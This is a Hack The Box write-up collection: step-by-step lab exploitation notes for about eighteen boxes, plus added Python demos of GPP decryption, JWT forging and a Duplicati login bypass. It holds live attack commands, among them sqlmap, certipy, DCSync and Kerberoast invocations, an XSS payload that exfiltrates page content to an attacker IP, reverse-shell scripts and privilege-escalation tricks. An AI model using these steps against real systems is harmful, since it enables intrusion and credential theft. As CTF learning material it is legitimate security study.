HTB
Vintage
Old style of writeups. I'm refocusing on Windows Medium/Hard boxes from now on, so those writeups can get quite complex and it's easier to put in screenshots. It's difficult to fit that style of writing into my old and lazy way of creating writeups. This means fewer boxes, but higher-quality writeups.
Box Name / Type / Steps / Lessons
Monitored
Linux
Easy
Foothold

1. blind SQL injection in the password reset
2. exfiltrate the admin password hash from admin_users
3. hashcat to crack the bcrypt hash
4. login as admin
5. upload a webshell from the profile page
6. reverse shell

PrivEsc

1. view .monitrc to get the password for the other user
2. as the other user, sudo -l to see what you can run
3. https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks#id-7z
Lessons

1. users and admin_users tables in Laravel
2. Hacking with 7z (wildcard tricks)
3. be aware of rabbit holes
Devvortex
Linux
Easy
Foothold

1. fuzz vhosts to find the dev page
2. fuzz the page to find the Joomla login page
3. find the Joomla version and its CVE
4. login to Joomla as admin
5. modify a PHP template to get a webshell
6. on the server, login to mysql to get the hash of the other user
7. hashcat to crack the hash and get the user flag

PrivEsc

1. sudo -l to view sudo commands
2. kill -BUS <pid> to generate a crash file in /var/crash/
3. sudo apport-cli -c <crash file>
4. view the report
5. in the viewer (a pager), start a bash shell with !/bin/bash
Lessons

1. Finding the Joomla version to see if there are exploits: /administrator/manifests/files/joomla.xml
2. generating crash files for apport-cli
Active
Windows
Easy
Foothold

1. nmap the target to find SMB shares
2. connect anonymously to the Replication share
3. pull Groups.xml, which has a username and an encrypted password (cpassword)
4. use gpp-decrypt to decrypt the password
5. connect to the SMB Users share with the username and password

PrivEsc

1. using the decrypted username and password, use impacket-GetUserSPNs to request a TGS for the Administrator SPN
2. Kerberoast: hashcat to crack the TGS and get the plaintext password for Administrator
3. using the cracked password, connect to the Users share again and navigate to the Administrator desktop
Lessons

1. Groups.xml contains credentials that you can decrypt with gpp-decrypt (the AES key is public, so this is decryption, not cracking)
They are stored in
\\<DOMAIN>\sysvol\<DOMAIN>\policies\<id>\MACHINE\Preferences\Groups\Groups.xml

2. GetUserSPNs.py fetches Service Principal Names that are associated with normal user accounts and requests a service ticket for each of them. The returned ticket is encrypted with a key derived from that account's password, so it can be cracked offline.
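Added example (mine, not from the writeup or from the gpp-decrypt tool): what gpp-decrypt does under the hood, in Python. The Groups.xml sample, the user name and the password are constructed here; the AES key is the one Microsoft published in MS-GPPREF, and the block shells out to the openssl binary, which is assumed to be on PATH.

```python
import base64
import subprocess
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published in MS-GPPREF for GPP cpassword values.
# Every domain uses the same key, which is why these passwords are recoverable offline.
GPP_AES_KEY_HEX = "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
GPP_AES_IV_HEX = "00" * 16  # all-zero IV


def _aes256_cbc(direction: str, data: bytes) -> bytes:
    """AES-256-CBC with the fixed GPP key and zero IV, via the openssl binary (assumed on PATH)."""
    return subprocess.run(
        ["openssl", "enc", direction, "-aes-256-cbc",
         "-K", GPP_AES_KEY_HEX, "-iv", GPP_AES_IV_HEX],
        input=data, capture_output=True, check=True,
    ).stdout


def gpp_decrypt(cpassword: str) -> str:
    """What gpp-decrypt does: restore the base64 padding, AES-decrypt, decode UTF-16LE."""
    padded = cpassword + "=" * (-len(cpassword) % 4)  # GPP strips the trailing '='
    return _aes256_cbc("-d", base64.b64decode(padded)).decode("utf-16-le")


def gpp_encrypt(password: str) -> str:
    """Inverse operation, used here only to build a constructed sample."""
    ciphertext = _aes256_cbc("-e", password.encode("utf-16-le"))
    return base64.b64encode(ciphertext).decode().rstrip("=")


def extract_gpp_credentials(groups_xml: bytes) -> list:
    """Return (userName, cpassword) for each <Properties> element that carries a cpassword."""
    root = ET.fromstring(groups_xml)
    return [
        (props.get("userName", ""), props.get("cpassword"))
        for props in root.iter("Properties")
        if props.get("cpassword")
    ]


def recover_gpp_credentials(groups_xml: bytes) -> list:
    """Parse Groups.xml and decrypt every cpassword it contains."""
    return [(user, gpp_decrypt(cp)) for user, cp in extract_gpp_credentials(groups_xml)]


def build_sample_groups_xml(username: str, password: str) -> bytes:
    """Constructed Groups.xml in the shape of a local-user preference item (not the box's file)."""
    return f"""<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="{username}" changed="2024-01-01 00:00:00">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="{gpp_encrypt(password)}" changeLogon="0" noChange="1"
                neverExpires="1" acctDisabled="0" userName="{username}"/>
  </User>
</Groups>
""".encode()


if __name__ == "__main__":
    sample = build_sample_groups_xml("svc_example", "ExampleGPPpassw0rd!")
    for user, plaintext in recover_gpp_credentials(sample):
        print(f"{user}:{plaintext}")
```

The only non-obvious parts are the two normalisation steps: Group Policy writes the base64 without its `=` padding, and the plaintext comes back as UTF-16LE because that is how Windows stored it.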
Builder
Linux
Medium
Foothold

1. nmap the target to find the open port that hosts the website
2. ffuf to scan vhosts and find dev.builder.htb
3. use the arbitrary file read (LFI) in the vulnerable Jenkins version
4. read users/users.xml and users/<user>/config.xml
5. hashcat to crack the password hash

PrivEsc

1. Once logged in as a user, use the file read to get root's encrypted SSH key from /var/jenkins_home/credentials.xml
2. Create a Groovy script to decrypt the SSH key for the root user
3. Login as root
Lessons

1. Users in Jenkins are stored in /var/jenkins_home/users/users.xml
2. Users' hashed passwords are in /var/jenkins_home/users/<user>/config.xml
3. Root's encrypted SSH key is in /var/jenkins_home/credentials.xml
Monitored
Linux
Medium
Foothold

1. nmap UDP to find SNMP (port 161/udp) open
2. snmpwalk to get credentials svc:XjH7VCehowpR1xZB

3. POST to /nagiosxi/api/v1/authenticate with those credentials to get an auth token

4. sqlmap to get the api_key of the Nagios admin user
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=<auth token>" --level 5 --risk 3 -p id -T xi_users -D nagiosxi --dump -C username,api_key

5. create a new admin user with the API key
curl -k -X POST "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=<nagios admin api key>&pretty=1" -d "username=baduser&password=baduser&name=baduser&email=baduser@monitored.htb&auth_level=admin"

6. create a command in Configure > Core Config Manager > Commands to get RCE

7. create a service in Configure > Core Config Manager > Services that runs the command

PrivEsc
1. sudo -l to view what commands you can run as sudo
2. find a script that reads the contents of a file and adds it to a zip archive
3. create a symlink from that file to /root/root.txt
4. run the command with sudo to get the contents of the root flag

Lessons

1. scan everything, TCP and UDP
2. Nagios shenanigans
3. symlinks to access root files
Greenhorn
Linux
Easy
Foothold

1. nmap reveals ports 80 and 3000
2. download the source code from Gitea on port 3000
3. get pass.php and crack the hash
4. use the CVE to upload a webshell and get RCE

PrivEsc

1. Run an HTTP server on the victim and download the PDF
2. depix the image to get the root password

Lessons

1. https://github.com/spipm/Depix to depixelate images
IClean
Linux
Medium
Foothold

1. XSS in the quotation form to get the admin session
2. SSTI in report generation
3. Use the SSTI to get RCE and a foothold
4. the SSTI filter blacklists . and __, so we play SSTI golf
5. reading app.py, get the mysql password
6. in the users table, get the hash of the user account and crack it
7. get the user flag

PrivEsc

1. sudo -l and see that we can run qpdf
2. sudo qpdf --empty /tmp/pwn.pdf --add-attachment /root/root.txt --
3. run a web server on the victim and download the PDF to the attacker VM
4. open the PDF and save the attachment to get the root flag

Lessons

1. qpdf shenanigans
PermX
Linux
Easy
Foothold

1. ffuf vhosts to find lms.permx.htb
2. CVE-2023-4220 to get a foothold
3. dump the password from ~/app/.../configuration.php
4. reuse the password to get access as user mtz

PrivEsc

1. sudo -l and see that we can run /opt/acl.sh
2. /opt/acl.sh runs setfacl to change the permissions of a file
3. we can't change the permissions of /root/root.txt directly as we don't have write permissions to the /root folder
4. /opt/acl.sh also checks for .. to prevent directory traversal
5. we get around this by creating a symlink to /

ln -s / pwned

6. generate a password hash for the new root password

openssl passwd <newpassword>

7. give mtz rwx on /etc/passwd through the symlink

sudo /opt/acl.sh mtz rwx /home/mtz/pwned/etc/passwd

8. edit /etc/passwd and replace the x in root's line with the hash generated above
9. su and enter the new password to get root

Lessons

1. how to pwn /etc/passwd if you have write access to it
2. symlinks
SolarLab
Windows
Medium
Foothold

1. smbmap with anonymous login to download the documents
2. Use credentials from the documents to log in to report.solarlab.htb on port 6791
3. RCE in reportlab; put the payload in the date field


PrivEsc

1. netstat -ano to find a service listening on 9090
2. chisel to port forward it to the attacker machine
3. CVE to create an admin user and upload a webshell (Openfire)

4. look at C:\Program Files\Openfire\embedded-db\openfire.script to get the admin password
5. decrypt with
6. smbclient -N //solarlab.htb/C$ -U "Administrator%password"

Lessons

1. Chisel port forwarding
2. CVE exploits
3. SMB shenanigans
Blazorized
Windows
Medium
Foothold

1. ffuf to find admin.blazorized.htb
2. Download shared.dll and reverse it to get the JWT signing key
3. Craft your own token signed with that key and put it in local storage at admin.blazorized.htb
4. SQL injection and xp_cmdshell to get RCE

PrivEsc

1. DACL attack 1: writing an SPN (targeted Kerberoast)

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "nu_1055"}

2. Set an SPN on RSA_4810, roast the ticket to get the password, then evil-winrm

Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='test/tester'}

Get-DomainSPNTicket -SPN test/tester

3. DACL attack 2: Modifiable Script Path

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RSA_4810"}

4. Upload rev.ps1 to a scripts folder

C:\Windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23

5. Set script path for SSA_6010

Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\rev.ps1'

6. Once authenticated as SSA_6010, get a meterpreter shell, load mimikatz and DCSync to get the Administrator hash

7. PTH to get root.txt
Lessons

1. DACL attacks
2. WebAssembly reversing
3. xp_cmdshell RCE
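Added example (mine, not from the writeup or from the box's code) of the token-forging step in Python's standard library: given the HS256 signing key recovered from shared.dll, mint a token with whatever claims you like, next to the server-side check that accepts it. The key value and the claim names (role, iss, aud) are placeholders; the real app's claim names may differ.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Constructed placeholder; on the box the real value is the symmetric key pulled out of shared.dll
LEAKED_KEY = "constructed-signing-key-recovered-from-shared.dll"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def forge_hs256(claims: dict, key: str) -> str:
    """Build header.payload.signature exactly as the legitimate issuer would, with the leaked key."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        _b64url(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, claims)
    )
    sig = hmac.new(key.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(sig)}"


def verify_hs256(token: str, key: str, now: Optional[float] = None) -> Optional[dict]:
    """Server-side check: pinned algorithm, constant-time signature compare, exp/nbf windows.
    A forged token passes because the key is the only thing the check depends on."""
    now = time.time() if now is None else now
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    try:
        header = json.loads(_b64url_decode(h))
        claims = json.loads(_b64url_decode(p))
        signature = _b64url_decode(s)
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":  # never let the token pick the algorithm
        return None
    expected = hmac.new(key.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    if claims.get("exp") is not None and now >= claims["exp"]:
        return None
    if claims.get("nbf") is not None and now < claims["nbf"]:
        return None
    return claims


def admin_claims(now: float) -> dict:
    # Claim names and values are assumed for illustration; check the real app's checks before forging
    return {
        "sub": "superadmin",
        "role": "Super_Admin",
        "iss": "https://blazorized.htb",
        "aud": "https://admin.blazorized.htb",
        "iat": int(now),
        "nbf": int(now),
        "exp": int(now) + 3600,
    }


if __name__ == "__main__":
    token = forge_hs256(admin_claims(time.time()), LEAKED_KEY)
    print(token)  # paste into the app's localStorage entry for the admin vhost
    print(verify_hs256(token, LEAKED_KEY))
```

Once the key is in a client-side DLL, every property the token is supposed to guarantee is gone: the server cannot distinguish a minted token from its own, which is why the fix is an asymmetric signature (or a key that never leaves the server), not a better check.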
Alert
Linux
Easy
Foothold

1. Upload a Markdown (.md) file that contains an XSS payload
<script>
fetch("http://alert.htb/messages.php").then(response => response.text()).then(response => {fetch("http://10.10.14.6/?"+btoa(response))})
</script>


2. send a message that contains a link to the hosted payload
email=test%40test.com&message=<script src="http://alert.htb/visualizer.php?link_share=675155dfa06ca8.28692334.md

3. get messages.php and see that it loads a file parameter that is vulnerable to LFI

<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>

4. LFI to read /etc/apache2/sites-enabled/000-default.conf

5. then LFI to read /var/www/statistics.alert.htb/.htpasswd and get albert's hash
albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/

6. crack the hash (hashcat mode 1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR))
hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt

7. SSH as albert

PrivEsc
1. run pspy64 to see the cronjob

/bin/sh -c /usr/bin/php -f /opt/website-monitor/monitor.php >/dev/null 2>&1
/usr/bin/php -f /opt/website-monitor/monitor.php

2. /opt/website-monitor/monitor.php includes config/configuration.php

3. we can edit config/configuration.php, so add
system('chmod +s /bin/bash');

4. get root (bash -p)

Lessons

1. /proc/self/cwd to reach the current working directory instead of guessing the directory path
Administrator
Windows
Medium
Foothold

1. enum4linux -u olivia -p ichliebedich -a 10.129.178.110
2. see that benjamin is part of the Share Moderators local group
3. olivia is part of Remote Management Users
4. WinRM into the machine
5. BloodHound
6. ethan can DCSync the DC
7. emily has GenericWrite on ethan
8. olivia has GenericWrite on michael
9. change the password for michael and log in as michael
10. michael can force a password change on benjamin (ForceChangePassword)
11. use rpcclient as michael
12. setuserinfo2 benjamin 23 password123!
13. FTP as benjamin to download Backup.psafe3
14. hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt (tekieromucho)
15. use Password Safe to open Backup.psafe3 and get emily's password

PrivEsc
1. Change password of ethan
2. Write an SPN to ethan
$SecPassword = ConvertTo-SecureString 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\emily', $SecPassword)

Set-DomainObject -Credential $Cred -Identity administrator.htb\ethan -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}

Get-DomainSPNTicket -Credential $Cred administrator.htb\ethan | fl

3. Kerberoast ethan based on this newly created SPN
impacket-GetUserSPNs -dc-ip 10.129.178.110 -request -outputfile kerberos administrator.htb/olivia

4. crack the hash (limpbizkit)
5. dc-sync to get admin hash
impacket-secretsdump administrator.htb/ethan:"limpbizkit"@10.129.178.110
6. log in as Administrator with the dumped hash (pass-the-hash)

Lessons

1. BloodHound
2. Find-InterestingDomainAcl
3. ACL abuses
4. DCSync can be done either on the machine (mimikatz) or remotely (impacket-secretsdump)
Certified
Windows
Medium
Foothold
1. Remote BloodHound to see that judith.mader can modify the Management group, and the Management group has GenericWrite on management_svc

Grant GenericAll on the Management group to judith.mader
python3 ~/tools/windows/bloodyAD/bloodyAD.py --host certified.htb -d certified.htb -u judith.mader -p judith09 add genericAll Management judith.mader

Once judith.mader has write access to Management, add the account to the group
net rpc group addmem Management judith.mader -U judith.mader -S certified.htb

Exploiting GenericWrite, we use certipy (shadow credentials) to get the NTLM hash of management_svc
certipy shadow auto -u judith.mader@certified.htb -p judith09 -account management_svc

2. using the hash, we use psexec to get a foothold

PrivEsc
1. management_svc has GenericAll over ca_operator
2. Change the password of ca_operator
3. use certipy to find a vulnerable template in the context of ca_operator

certipy find -u 'ca_operator@certified.htb' -p password123\! -dc-ip 10.129.244.229 -vulnerable

4. certipy shenanigans with the vulnerable template (the UPN-swap flow from the article: set ca_operator's UPN to administrator, request a certificate, set the UPN back, authenticate with the certificate)
https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7

certipy account update -username management_svc@certified.htb -hashes 00000000000000000000000000000000:a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn administrator

certipy req -ca certified-DC01-CA -u 'ca_operator@certified.htb' -p password123\! -dc-ip 10.129.244.229 -template CertifiedAuthentication

certipy account update -username management_svc@certified.htb -hashes 00000000000000000000000000000000:a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator

certipy auth -pfx administrator.pfx -dc-ip 10.129.244.229

to get the Administrator hash

5. psexec and get root

Lessons

1. certipy shenanigans
MonitorsThree
Linux
Medium
Foothold
1. SQL injection in monitorsthree.htb/forgot_password.php to get the admin password
2. Fuzz vhosts to find cacti.monitorsthree.htb
3. login with the admin password
4. exploit CVE-2024-25641 to get RCE
5. check one of the config files to get cactiuser:cactiuser for mysql
6. get marcus' hash and crack it with hashcat
hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt
7. get the local flag as marcus

PrivEsc
1. There's a service listening on port 8200
2. chisel our way in and find Duplicati running
https://medium.com/@STarXT/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee
3. We also find Duplicati-server.sqlite, which contains server-passphrase and server-passphrase-salt
4. Look at http://localhost:8200/login/login.js to see how the client authenticates
5. It first requests a nonce, then computes
SHA256(nonce + SHA256(passphrase + server-passphrase-salt))
where the inner hash is exactly the value stored as server-passphrase in the sqlite database, so the stored value can be used without ever knowing the passphrase
6. It then sends that hash back for verification
7. back up root.txt and restore it to /source/home/marcus/root.txt

Lessons

1. Don't forget vhost fuzzing!
2. Duplicati shenanigans
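Added example (mine, not from the writeup or from Duplicati) modelling the login.js scheme described above in Python, so the bypass is visible end to end. The passphrase, salt and server are constructed here, and DuplicatiLoginModel only mimics the nonce check; it is not the real server code.

```python
import base64
import hashlib
import hmac
import secrets


def salted_passphrase(passphrase: str, salt_b64: str) -> bytes:
    """First step in login.js: SHA256(passphrase || salt).
    base64 of this is what the server keeps as server-passphrase in Duplicati-server.sqlite."""
    return hashlib.sha256(passphrase.encode() + base64.b64decode(salt_b64)).digest()


def nonced_response(salted: bytes, nonce_b64: str) -> str:
    """Second step: SHA256(nonce || salted), base64-encoded, sent as the 'password' field."""
    digest = hashlib.sha256(base64.b64decode(nonce_b64) + salted).digest()
    return base64.b64encode(digest).decode()


class DuplicatiLoginModel:
    """Minimal stand-in for the server side of the handshake (constructed, not Duplicati's code)."""

    def __init__(self, server_passphrase_b64: str, server_salt_b64: str):
        self.stored = base64.b64decode(server_passphrase_b64)  # already the salted hash
        self.salt_b64 = server_salt_b64
        self.nonce_b64 = None

    def get_nonce(self) -> tuple:
        self.nonce_b64 = base64.b64encode(secrets.token_bytes(32)).decode()
        return self.nonce_b64, self.salt_b64

    def login(self, response_b64: str) -> bool:
        if self.nonce_b64 is None:
            return False
        expected = nonced_response(self.stored, self.nonce_b64)
        self.nonce_b64 = None  # a nonce is good for one attempt
        return hmac.compare_digest(expected, response_b64)


def login_with_passphrase(server: DuplicatiLoginModel, passphrase: str) -> bool:
    """What the browser does with a real passphrase."""
    nonce, salt = server.get_nonce()
    return server.login(nonced_response(salted_passphrase(passphrase, salt), nonce))


def login_with_stored_hash(server: DuplicatiLoginModel, server_passphrase_b64: str) -> bool:
    """The bypass: the DB value *is* the salted hash, so neither the salt nor the passphrase is needed."""
    nonce, _ = server.get_nonce()
    return server.login(nonced_response(base64.b64decode(server_passphrase_b64), nonce))


def make_server(passphrase: str) -> tuple:
    """Build a server with a random salt; returns (server, stored server-passphrase) for the demo."""
    salt_b64 = base64.b64encode(secrets.token_bytes(16)).decode()
    stored_b64 = base64.b64encode(salted_passphrase(passphrase, salt_b64)).decode()
    return DuplicatiLoginModel(stored_b64, salt_b64), stored_b64


if __name__ == "__main__":
    server, stored = make_server("constructed-passphrase")
    print("with passphrase:", login_with_passphrase(server, "constructed-passphrase"))
    print("with stored hash only:", login_with_stored_hash(server, stored))
```

The nonce stops a captured response from being replayed, but it does nothing about the stored value itself: anything that can read Duplicati-server.sqlite holds a credential that is as good as the passphrase.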
Trickster
Linux
Medium
Foothold
1. Fuzz out a .git folder
2. git-dumper to get the contents, and find the admin page
3. CVE-2024-34716; XSS in image upload, and unrestricted file upload gets you a webshell
https://ayoubmokhtar.com/post/png_driven_chain_xss_to_remote_code_execution_prestashop_8.1.5_cve-2024-34716/
4. Find the mysql password and crack james' hash with hashcat
5. su james to get the local flag

PrivEsc
1. Find another IP address on the network, with a service running on port 5000
2. chisel to access the service, which is changedetection.io
3. use james' password to get access to the changedetection.io admin page
4. exploit the SSTI vulnerability in changedetection.io to get RCE in the Docker container
https://nvd.nist.gov/vuln/detail/CVE-2024-32651
5. As root in the Docker container, download the backup zip files
6. Unzip the contents and decode them using https://brotli.myl.moe/
7. Get the password for adam
8. adam can run prusaslicer as sudo
9. exploit it to get the root flag
https://www.exploit-db.com/exploits/51983

Lessons

1. Check for other IP addresses, not just services running on localhost
Heal
Linux
Medium
Foothold
1. LFI to get sensitive data from Ruby (Rails) files
https://gist.github.com/harisec/b2deded5be122de0133dcd64dc8baa86
2. Crack the hash for the user
3. Log in to the LimeSurvey console
4. Exploit to get a foothold
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
5. Get the reused password from the config file

PrivEsc
1. Find another service running on the local machine
2. Chisel to get access to it
3. RCE by registering a health check whose Args run our script
https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/8171
{
  "ID": "gg",
  "Name": "gg",
  "Shell": "/bin/sh",
  "Interval": "5s",
  "Args": ["/bin/bash", "/tmp/rev.sh"]
}

Lessons

1. Ruby sensitive files
Linkvortex
Linux
Easy
Foothold
1. Fuzz to get the vhost
2. Fuzz the vhost to find .git
3. Dump the .git directory with git-dumper
4. Find the password with grep -rne "password\s*="
5. git log to see the version of Ghost CMS that is vulnerable
6. Exploit the CVE to get LFI
7. LFI to read /var/lib/ghost/config.production.json and get credentials for SSH

PrivEsc
1. sudo -l to find out the command you can run
2. The script checks whether the link points to /root or /etc
3. Create a nested link so that a.png -> b.png -> /root/root.txt
4. Export the environment variable: export CHECK_CONTENT=true
5. sudo /usr/bin/bash /opt/ghost/clean_symlink.sh b.png c.png

Lessons

1. Link file shenanigans
2. git log does not always contain everything
3. Check .git/logs/HEAD to see who cloned the repo
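Added example (mine, not from the writeup or from the box's clean_symlink.sh, whose real logic is not on this page) showing why the nested link works: a check that looks at only one hop of readlink passes a.png -> b.png -> target, while resolving the whole chain with realpath catches it. The directories and file are constructed in a temp dir, with secret/ standing in for /root.

```python
import os
import tempfile


def naive_is_forbidden(link: str, forbidden_dirs: tuple) -> bool:
    """Model of a one-hop check: inspect only what `readlink link` returns."""
    target = os.readlink(link)
    return any(target == d or target.startswith(d + os.sep) for d in forbidden_dirs)


def strict_is_forbidden(link: str, forbidden_dirs: tuple) -> bool:
    """Resolve every hop and compare canonical paths on both sides."""
    final = os.path.realpath(link)
    canon = [os.path.realpath(d) for d in forbidden_dirs]
    return any(final == d or final.startswith(d + os.sep) for d in canon)


def build_demo() -> dict:
    """Constructed layout: secret/root.txt is the protected file, c.png points at it
    directly, a.png reaches it through b.png."""
    with tempfile.TemporaryDirectory() as work:
        secret_dir = os.path.join(work, "secret")  # stands in for /root
        os.makedirs(secret_dir)
        secret = os.path.join(secret_dir, "root.txt")
        with open(secret, "w") as fh:
            fh.write("flag{constructed}\n")
        forbidden = (secret_dir,)

        direct = os.path.join(work, "c.png")  # c.png -> secret/root.txt
        os.symlink(secret, direct)
        hop = os.path.join(work, "b.png")     # b.png -> secret/root.txt
        os.symlink(secret, hop)
        nested = os.path.join(work, "a.png")  # a.png -> b.png
        os.symlink(hop, nested)

        return {
            "direct_naive": naive_is_forbidden(direct, forbidden),
            "direct_strict": strict_is_forbidden(direct, forbidden),
            "nested_naive": naive_is_forbidden(nested, forbidden),
            "nested_strict": strict_is_forbidden(nested, forbidden),
        }


if __name__ == "__main__":
    for name, blocked in build_demo().items():
        print(f"{name}: {'blocked' if blocked else 'allowed'}")
```

Even the strict version only closes the nesting hole: a privileged script that checks a path and then opens it later is still racy, since the link can be repointed between the check and the open. Opening the file once and checking what was actually opened (fstat on the descriptor) is the robust pattern.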
Vintage
Windows
Hard
Foothold
1. ldapsearch -x -H ldap://10.129.255.247 -b "dc=vintage,dc=htb" -w Rosaisbest123 -D p.rosa@vintage.htb
2. Find the DC name dc01.vintage.htb
3. python3 bloodhound.py -u P.Rosa -p 'Rosaisbest123' -d vintage.htb -c All -ns 10.129.255.247 --zip -dc dc01.vintage.htb